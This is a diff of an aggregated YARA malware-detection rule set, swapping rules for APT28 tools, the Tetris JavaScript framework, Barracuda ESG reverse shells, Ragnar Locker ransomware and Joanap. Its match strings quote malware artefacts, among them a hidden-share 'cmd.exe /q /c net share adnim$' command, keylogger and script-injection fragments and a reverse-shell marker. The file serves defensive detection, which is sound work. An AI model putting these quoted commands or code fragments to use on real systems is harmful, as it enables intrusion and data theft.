+		hash = "c1ca82411e293ec5d16a8f81ed9466972a8ead23bd4080aaf9505baccce575ba"
+		hash = "c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731"
+		hash = "c8b40fbb5cd27f42c143c35b67c700f7ea42a2084418c5e2da82fb0ac094f966"
+		hash = "cd5bbcf663f06003637e4aab348bbec3d4a47e53e8fa85826e161d34b86e93f8"
+		hash = "d879ff9275cd62f4e7935261e17461d3a3cd1a29d65a5688bd382c47ae680ad6"
+		hash = "e92c85b36d0848171ada787862413e0edd8291c8ae6a43e13b075b9ccbd53434"
+		hash = "f22f2932c02bbd47ea556e15a51c20301ca7084c4b943672ade70bc49dc3e0c4"
+		logic_hash = "39b68d6920b83e36942456b8ff0eeff18ae280e13e86df916c3586922d79aba8"
+		score = 75
+		quality = 80
+		tags = "COMMODITY, FILE"
+		license = "DRL-1.1"
+		tlp = "TLP:CLEAR"
+		pap = "PAP:CLEAR"
+
+	strings:
+		$s1 = "Forward UDP traffic between %s (encrypted: %v) and %s (encrypted: %v)"
+		$s2 = "Open pipe: %s <== FWD ==> %s"
+		$s3 = "Reverse socks5 server handshake ok from %s (encrypted: %v)"
+		$s4 = "Recv exit signal from remote, exit now"
+		$s5 = "socks consult transfer mode or parse target: %s"
+
+	condition:
+		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xcefaedfe ) and filesize < 5MB and all of them
+}
 /*
  * YARA Rule Set
  * Repository Name: ArtifactDrop
  * Repository: https://github.com/matthieugras/artifact-drop/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: d2bcbe820bc134a4ed672ef6013498f856561af4
  * Number of Rules: 1
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -260555,10 +260678,10 @@ rule ARTIFACTDROP_Go_Reflectiveloader_Decryption_Loop : FILE
  * YARA Rule Set
  * Repository Name: Signature Base
  * Repository: https://github.com/Neo23x0/signature-base
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 63ed72f6a9032086f706578a6688d3072787612c
- * Number of Rules: 4413
- * Skipped: 0 (age), 9 (quality), 4 (score), 0 (importance)
+ * Number of Rules: 4415
+ * Skipped: 0 (age), 7 (quality), 4 (score), 0 (importance)
  *
  *
  * LICENSE
@@ -260793,64515 +260916,64194 @@ private rule SIGNATURE_BASE_Hatman_Setstatus_PRIVATE : HATMAN
 	condition:
 		$preset
 }
-rule SIGNATURE_BASE_Apt_CN_Tetris_JS_Advanced_1 : FILE
-{
-	meta:
-		description = "Unique code from Jetriz, Swid & Jeniva of the Tetris framework"
-		author = "@imp0rtp3 (modified by Florian Roth)"
-		id = "a56f69f5-3562-52ab-9686-411019c51055"
-		date = "2020-09-06"
-		modified = "2023-12-05"
-		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tetris.yar#L2-L31"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec4ba53fea05c5331ed900b8c7da4cddd4ab64e87dfc165ac18d72d22f754d87"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$a1 = "var a0_0x"
-		$b1 = "a0_0x" ascii
-		$cx1 = "))),function(){try{var _0x"
-		$cx2 = "=window)||void 0x0===_0x"
-		$cx3 = "){if(opener&&void 0x0!==opener["
-		$cx4 = "String['fromCharCode'](0x"
-		$e1 = "')](__p__)"
-
-	condition:
-		$a1 at 0 or ( filesize < 1000KB and ( #b1 > 300 or #e1 > 1 or 2 of ( $cx* ) ) )
-}
-rule SIGNATURE_BASE_Apt_CN_Tetrisplugins_JS : FILE
-{
-	meta:
-		description = "Code and strings of plugins from the Tetris framework loaded by Swid"
-		author = "@imp0rtp3"
-		id = "83e6fbad-55d6-5229-a17d-8929e0e658f8"
-		date = "2020-09-06"
-		modified = "2023-12-05"
-		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tetris.yar#L34-L114"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa77d622584e79c86139b9c0f0b8ff46fc10461d0776e46c93490b6bb667afcf"
-		score = 75
-		quality = 60
-		tags = "FILE"
-
-	strings:
-		$a3 = "(0xbb8);this['socketWatcher'](0xbb9);this["
-		$a4 = "a2869674571f77b5a0867c3d71db5856"
-		$a5 = "\\x0a\\x20\\x20var\\x20data\\x20=\\x20{}\\x0a\\x20\\x20window.c\\x20=\\x200\\x0a\\x20\\x20script2\\x20=\\x20document.createElement(\\x22script\\x22)\\x0a\\x20\\x20script2.async\\x20=\\x20true\\x0a\\x20\\x20script2.src\\x20=\\x20\\x22"
-		$a6 = "{isPluginCallback:\\x20true,\\x20data,\\x20plugin:\\x20'"
-		$a7 = "\\x20\\x22*\\x22)\\x0a\\x20\\x20}\\x0a\\x20\\x20document.documentElement.appendChild("
-		$b1 = "String(str).match(/red\">(.*?)<\\/font>/)"
-		$b2 = "['data']);}};}},{'key':'run','value':function _0x"
-		$b3 = "},{'plugin':this['plugin'],'save':!![],'type':_typeof("
-		$b4 = "Cannot\\x20call\\x20a\\x20class\\x20as\\x20a\\x20function"
-		$b5 = "The\\x20command\\x20is\\x20sent\\x20successfully,\\x20wait\\x20for\\x20the\\x20result\\x20to\\x20return"
-		$b6 = "getUserMedia\\x20is\\x20not\\x20implemented\\x20in\\x20this\\x20browser"
-		$b7 = "{'autoplay':'true'},!![]);setTimeout(function(){return $('#'+"
-		$b8 = "keyLogger($('input'));\n        keyLogger($('textarea'));"
-		$b9 = "api.loadJS(\"\".concat(api.base.baseUrl"
-		$b10 = "\"\".concat(imgUrls[i], \"?t=\""
-		$b11 = "key: \"report\",\n      value: function report(data) {\n        return this.api.callback"
-		$b12 = "that.api.base.debounce("
-		$b13 = "'className','restOfNavigator','push'"
-		$b14 = ";};'use strict';function _typeof("
-		$c1 = "/public/dependence/jquery"
-		$c2 = "'http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png'"
-		$c3 = "'163.com not login';"
-		$c4 = "'ws://localhost:'"
-		$c5 = "function _typeof(obj) { \"@babel/helpers - typeof\"; "
-		$c6 = "'socketWatcher'"
-		$c7 = "['configurable']=!![];"
-		$c8 = "')]({'status':!![],'data':_0x"
-		$c9 = "')]={'localStorage':'localStorage'in window?window[_0x"
-		$c10 = "Browser not supported geolocation.');"
-		$c11 = "')]({'status':!![],'msg':'','data':_0x"
-		$c12 = "var Plugin = /*#__PURE__*/function () {"
-		$use_strict1 = "\"use strict\";"
-		$use_strict2 = "'use strict';"
-		$e1 = "Cannot\x20call\x20a\x20class\x20as\x20a\x20function" base64
-		$e2 = "The\x20command\x20is\x20sent\x20successfully,\x20wait\x20for\x20the\x20result\x20to\x20return" base64
-		$e3 = "getUserMedia\x20is\x20not\x20implemented\x20in\x20this\x20browser" base64
-		$e4 = "http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png" base64
-		$e5 = "/public/dependence/jquery" base64
-		$e6 = "\x20\x22*\x22)\x0a\x20\x20}\x0a\x20\x20document.documentElement.appendChild(" base64
-		$e8 = "\x0a\x20\x20var\x20data\x20=\x20{}\x0a\x20\x20window.c\x20=\x200\x0a\x20\x20script2\x20=\x20document.createElement(\x22script\x22)\x0a\x20\x20script2.async\x20=\x20true\x0a\x20\x20script2.src\x20=\x20\x22" base64
-		$e9 = "{isPluginCallback:\x20true,\x20data,\x20plugin:\x20" base64
-
-	condition:
-		filesize < 1000000 and ( any of ( $a* ) or 2 of ( $b* ) or 4 of ( $c* ) or 2 of ( $e* ) or ( any of ( $use_strict* ) and ( ( any of ( $b* ) and 2 of ( $c* ) ) or any of ( $e* ) ) ) )
-}
-rule SIGNATURE_BASE_APT28_CHOPSTICK : FILE
-{
-	meta:
-		description = "Detects a malware that behaves like CHOPSTICK mentioned in APT28 report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08bc4cc2-1844-5218-bb89-20a3ac70a951"
-		date = "2015-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/v3ebal"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L10-L32"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f4db2e0881f83f6a2387ecf446fcb4a4c9f99808"
-		logic_hash = "750b2d5157856e0ffd840406eec601ded51ced7ccb20b577f336bbaf32681835"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "jhuhugit.tmp" fullword ascii
-		$s8 = "KERNEL32.dll" fullword ascii
-		$s9 = "IsDebuggerPresent" fullword ascii
-		$s10 = "IsProcessorFeaturePresent" fullword ascii
-		$s11 = "TerminateProcess" fullword ascii
-		$s13 = "DeleteFileA" fullword ascii
-		$s15 = "GetProcessHeap" fullword ascii
-		$s16 = "!This program cannot be run in DOS mode." fullword ascii
-		$s17 = "LoadLibraryA" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 722KB and all of them
-}
-rule SIGNATURE_BASE_APT28_Sourface_Malware1 : FILE
-{
-	meta:
-		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
-		author = "Florian Roth (Nextron Systems)"
-		id = "d4275b8d-384f-58b7-bac5-05fb7db659e2"
-		date = "2015-06-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L34-L50"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ec1e5db74b5abe1da0d454b5e901bd808a0be318235f25d713cfdc4aea8d6d7"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		hash1 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
-		hash2 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
-
-	strings:
-		$s0 = "coreshell.dll" fullword wide
-		$s1 = "Core Shell Runtime Service" fullword wide
-		$s2 = "\\chkdbg.log" wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
-}
-rule SIGNATURE_BASE_APT28_Sourface_Malware2 : FILE
-{
-	meta:
-		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
-		author = "Florian Roth (Nextron Systems)"
-		id = "8a9df742-82c1-56bb-ab70-6384403f70b5"
-		date = "2015-06-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L52-L72"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed0424e61ca3243241e32d4f744398d263d7e35de15d94e9c6f816dc7349c267"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		super_rule = 1
-		hash0 = "367d40465fd1633c435b966fa9b289188aa444bc"
-		hash1 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
-		hash2 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
-		hash3 = "682e49efa6d2549147a21993d64291bfa40d815a"
-		hash4 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
-		hash5 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
-
-	strings:
-		$s0 = "coreshell.dll" fullword ascii
-		$s1 = "Applicate" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
-}
-rule SIGNATURE_BASE_APT28_Sourface_Malware3 : FILE
-{
-	meta:
-		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
-		author = "Florian Roth (Nextron Systems)"
-		id = "b49843b9-3a54-5525-958e-ac545cc00bde"
-		date = "2015-06-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L74-L98"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "894fc2913cf1fa8aecb3052e762d4403124fcbdb2148edb23a9117c2f2b8eddc"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		super_rule = 1
-		hash0 = "85522190958c82589fa290c0835805f3d9a2f8d6"
-		hash1 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
-		hash2 = "367d40465fd1633c435b966fa9b289188aa444bc"
-		hash3 = "d87b310aa81ae6254fff27b7d57f76035f544073"
-		hash4 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
-		hash5 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
-		hash6 = "682e49efa6d2549147a21993d64291bfa40d815a"
-		hash7 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
-		hash8 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
-		hash9 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
-
-	strings:
-		$s0 = "coreshell.dll" fullword wide
-		$s1 = "Core Shell Runtime Service" fullword wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
-}
-rule SIGNATURE_BASE_APT28_Skinnyboy_Dropper_1 : RUSSIA FILE
-{
-	meta:
-		description = "Detects APT28 SkinnyBoy droppers"
-		author = "Cluster25"
-		id = "ed0b2d2b-f820-57b5-9654-c24734d81996"
-		date = "2021-05-24"
-		modified = "2023-12-05"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28.yar#L103-L118"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9e29ed985fac8701f72f0860fe101272c3c3342ef6857e30d32f5fea14822945"
-		score = 75
-		quality = 85
-		tags = "RUSSIA, FILE"
-		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
-
-	strings:
-		$ = "cmd /c DEL " ascii
-		$ = {8a 08 40 84 c9 75 f9}
-		$ = {0f b7 84 0d fc fe ff ff 66 31 84 0d fc fd ff ff}
-
-	condition:
-		( uint16( 0 ) == 0x5A4D and all of them )
-}
-rule SIGNATURE_BASE_MAL_ELF_Reverseshell_Sslshell_Jun23_1 : CVE_2023_2868 FILE
-{
-	meta:
-		description = "Detects reverse shell named SSLShell used in Barracuda ESG exploitation (CVE-2023-2868)"
-		author = "Florian Roth"
-		id = "91b34eb7-61d2-592e-a444-249da43994ca"
-		date = "2023-06-07"
-		modified = "2023-12-05"
-		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_barracuda_cve_2023_2868.yar#L2-L19"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "57e9afb2f6928656242b8257cc3b98ae3b03e38c75ad40b544e3fc6afaea794d"
-		score = 75
-		quality = 85
-		tags = "CVE-2023-2868, FILE"
-		hash1 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
-
-	strings:
-		$sc1 = { 00 2D 63 00 2F 62 69 6E 2F 73 68 00 }
-		$s1 = "SSLShell"
-
-	condition:
-		uint32be( 0 ) == 0x7f454c46 and uint16( 0x10 ) == 0x0002 and filesize < 5MB and all of them
-}
-rule SIGNATURE_BASE_MAL_ELF_SALTWATER_Jun23_1 : CVE_2023_2868 FILE
+rule SIGNATURE_BASE_PUP_Computraceagent : FILE
 {
 	meta:
-		description = "Detects SALTWATER malware used in Barracuda ESG exploitations (CVE-2023-2868)"
-		author = "Florian Roth"
-		id = "10a038f6-6096-5d3a-aaf5-db441685102b"
-		date = "2023-06-07"
+		description = "Absolute Computrace Agent Executable"
+		author = "ASERT - Arbor Networks (slightly modified by Florian Roth)"
+		id = "676f8f1e-a3b4-5d05-b13b-bd6cb0aabbbd"
+		date = "2018-05-01"
 		modified = "2023-12-05"
-		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_barracuda_cve_2023_2868.yar#L21-L46"
+		reference = "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_computrace_agent.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb35898c0ee726170da93b4364920ac065f083f9f02db8eb5d293b1ce127cb78"
-		score = 80
+		logic_hash = "65e964e68be1e286ab3aa39677e250cf5994a7a08d0f6db286c0260cf77d6c48"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-2868, FILE"
-		hash1 = "601f44cc102ae5a113c0b5fe5d18350db8a24d780c0ff289880cc45de28e2b80"
+		tags = "FILE"
 
 	strings:
-		$x1 = "libbindshell.so"
-		$s1 = "ShellChannel"
-		$s2 = "MyWriteAll"
-		$s3 = "CheckRemoteIp"
-		$s4 = "run_cmd"
-		$s5 = "DownloadByProxyChannel"
-		$s6 = "[-] error: popen failed"
-		$s7 = "/home/product/code/config/ssl_engine_cert.pem"
+		$a = { D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04 }
+		$b1 = { 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00 }
+		$b2 = { 54 61 67 49 64 00 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 6000KB and ( ( 1 of ( $x* ) and 2 of them ) or 3 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( $a or ( $b1 and $b2 ) )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Ragna_Locker_Apr20_1 : FILE
+
+rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample1 : FILE
 {
 	meta:
-		description = "Detects Ragna Locker Ransomware"
+		description = "Detects malware from TA18-149A report by US-CERT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "67164cb4-73b7-5c4e-88f9-42379b88c641"
-		date = "2020-04-27"
+		id = "a3a4f9a6-367d-5d99-bffb-f4ff03fa4a09"
+		date = "2018-05-30"
 		modified = "2023-12-05"
-		reference = "https://otx.alienvault.com/indicator/file/c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_ragna_locker.yar#L3-L36"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_149A.yar#L13-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05a18818f22c836c3e1f1fa9682d787bbe86e6d3bb026a80a7d4c33ad95c2cd3"
+		logic_hash = "746c74713ac52f62d5a5c41d2c9321e00481a45aa2c23f1695fab0f5b6d5dfb4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ea46ed5aed900cd9f01156a1cd446cbb3e10191f9f980e9f710ea1c20440c781"
 
 	strings:
-		$x1 = "---RAGNAR SECRET---" ascii
-		$xc1 = { 0D 0A 25 73 0D 0A 0D 0A 25 73 0D 0A 25 73 0D 0A
-               25 73 0D 0A 0D 0A 25 73 0D 0A 00 00 2E 00 72 00
-               61 00 67 00 6E 00 61 00 72 00 5F }
-		$xc2 = { 00 2D 00 66 00 6F 00 72 00 63 00 65 00 00 00 00
-               00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C
-               00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00
-               00 5C 00 6E 00 6F 00 74 00 65 00 70 00 61 00 64
-               00 2E 00 65 00 78 00 65 00 }
-		$s1 = "bootfont.bin" wide fullword
-		$sc2 = { 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 00
-               00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 2E
-               00 6F 00 6C 00 64 00 00 00 54 00 6F 00 72 00 20
-               00 62 00 72 00 6F 00 77 00 73 00 65 00 72 00 }
-		$op1 = { c7 85 58 ff ff ff 55 00 6b 00 c7 85 5c ff ff ff }
-		$op2 = { 50 c7 85 7a ff ff ff 5c }
-		$op3 = { 8b 75 08 8a 84 0d 20 ff ff ff ff 45 08 32 06 8b }
+		$x1 = "cmd.exe /q /c net share adnim$" ascii
+		$x2 = "\\\\%s\\adnim$\\system32\\%s" fullword ascii
+		$s1 = "SMB_Dll.dll" fullword ascii
+		$s2 = "%s User or Password is not correct!" fullword ascii
+		$s3 = "perfw06.dat" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "f0087d7b90876a2769f2229c6789fcf3" or 1 of ( $x* ) or 2 of them )
 }
 
-rule SIGNATURE_BASE_MAL_Ransom_Ragnarlocker_July_2020_1 : FILE
+rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample2 : FILE
 {
 	meta:
-		description = "Detects Ragnarlocker by strings (July 2020)"
-		author = "Arkbird_SOLG"
-		id = "60e09057-d9f8-5e89-8f47-c5dda32806c6"
-		date = "2020-07-30"
+		description = "Detects malware from TA18-149A report by US-CERT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f4e6e6c-ee2b-5fa3-bf85-5a1652b38c52"
+		date = "2018-05-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_ragna_locker.yar#L38-L70"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_149A.yar#L36-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dc44da2f9023e0702afa8081e85ba817ebfde15f449261fae9de729d51262b04"
+		logic_hash = "046135e4a1161841835cd9d10e13224b440e914ce3f409bad84a1df2638a7d5f"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "077d9e0e12357d27f7f0c336239e961a7049971446f7a3f10268d9439ef67885"
 
 	strings:
-		$f1 = "bootfont.bin" fullword wide
-		$f2 = "bootmgr.efi" fullword wide
-		$f3 = "bootsect.bak" fullword wide
-		$r1 = "$!.txt" fullword wide
-		$r2 = "---BEGIN KEY R_R---" fullword ascii
-		$r3 = "!$R4GN4R_" wide
-		$r4 = "RAGNRPW" fullword ascii
-		$r5 = "---END KEY R_R---" fullword ascii
-		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
-		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
-		$a3 = "WinSta0\\Default" fullword wide
-		$a4 = "%s-%s-%s-%s-%s" fullword wide
-		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
-		$c1 = "-backup" fullword wide
-		$c2 = "-force" fullword wide
-		$c3 = "-vmback" fullword wide
-		$c4 = "-list" fullword wide
-		$s1 = ".ragn@r_" wide
-		$s2 = "\\notepad.exe" wide
-		$s3 = "Opera Software" fullword wide
-		$s4 = "Tor browser" fullword wide
+		$s1 = "%SystemRoot%\\system32\\svchost.exe -k Wmmvsvc" fullword ascii
+		$s2 = "%SystemRoot%\\system32\\svchost.exe -k SCardPrv" fullword ascii
+		$s3 = "%SystemRoot%\\system32\\Wmmvsvc.dll" fullword ascii
+		$s4 = "%SystemRoot%\\system32\\scardprv.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "e8cd12071a8e823ebc434c8ee3e23203" or 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Kwampirs_Apr18 : KWAMPIRS
+
+rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample3 : FILE
 {
 	meta:
-		description = "Kwampirs dropper and main payload components"
-		author = "Symantec"
-		id = "298e2868-e90e-55b4-9115-9f0b43521266"
-		date = "2018-04-23"
+		description = "Detects malware from TA18-149A report by US-CERT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1c2551bc-01dd-5b30-a4cc-703a868cde73"
+		date = "2018-05-30"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kwampirs.yar#L1-L70"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_149A.yar#L57-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9387c46b9e3fff90415c46af270d143bdeb6292f2521d889b8d6ae726a4cf3b"
+		logic_hash = "a3da6c70d2ab94820324a55f1bcdcf5507a8ddf26efc80904daf0d9b27ac9312"
 		score = 75
 		quality = 85
-		tags = "KWAMPIRS"
-		family = "Kwampirs"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a1c483b0ee740291b91b11e18dd05f0a460127acfc19d47b446d11cd0e26d717"
 
 	strings:
-		$pubkey = {
-            06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00
-            01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5
-            97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9
-            E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31
-            48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A
-            CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11
-            56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33
-            02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2
-            9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28
-            4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B
-            4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71
-            6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9
-            59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36
-            EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
-            C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6
-            FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D
-            90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF
-            F7 E4 0C B3
-        }
-		$network_xor_key = {
-            B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38
-            C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0
-            91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58
-            C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68
-            CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B
